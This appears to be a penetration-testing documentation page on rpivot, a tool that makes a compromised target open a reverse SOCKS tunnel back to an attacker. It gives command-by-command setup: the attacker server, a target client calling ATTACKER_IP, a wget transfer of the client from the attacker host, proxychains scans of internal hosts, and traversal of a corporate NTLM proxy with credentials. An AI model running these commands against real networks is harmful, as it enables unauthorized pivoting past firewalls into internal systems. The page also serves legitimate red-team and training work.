Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

rpivot creates reverse SOCKS proxy — target connects back to attacker. Useful when target can reach attacker but not vice versa (firewall/NAT).

Download

git clone https://github.com/klsecservices/rpivot.git

Setup

Attacker (Server)

python2 server.py --server-port 9999 --server-ip 0.0.0.0 --proxy-ip 127.0.0.1 --proxy-port 1080

Target (Client)

python2 client.py --server-ip ATTACKER_IP --server-port 9999
SOCKS4 proxy on attacker at 127.0.0.1:1080.

Transfer Client to Target

# Attacker — serve files
cd rpivot && python3 -m http.server 8000

# Target — download
wget http://ATTACKER_IP:8000/client.py

Use with ProxyChains

# /etc/proxychains4.conf
socks4 127.0.0.1 1080

proxychains nmap -sT -Pn INTERNAL_TARGET
proxychains curl http://INTERNAL_TARGET

Through NTLM Proxy

If target is behind corporate proxy with NTLM auth: 
python2 client.py --server-ip ATTACKER_IP --server-port 9999 --ntlm-proxy-ip PROXY_IP --ntlm-proxy-port 8080 --domain DOMAIN --username USER --password PASS

Notes

  • Requires Python 2 on target
  • SOCKS4 only (not SOCKS5)
  • Single-hop pivot
  • Lightweight — just client.py needed on target

Quick Reference

TaskCommand
Serverpython2 server.py --server-port 9999 --proxy-port 1080
Clientpython2 client.py --server-ip ATTACKER --server-port 9999
Proxy typeSOCKS4 on 127.0.0.1:1080
NTLM proxyAdd --ntlm-proxy-ip/port/domain/user/pass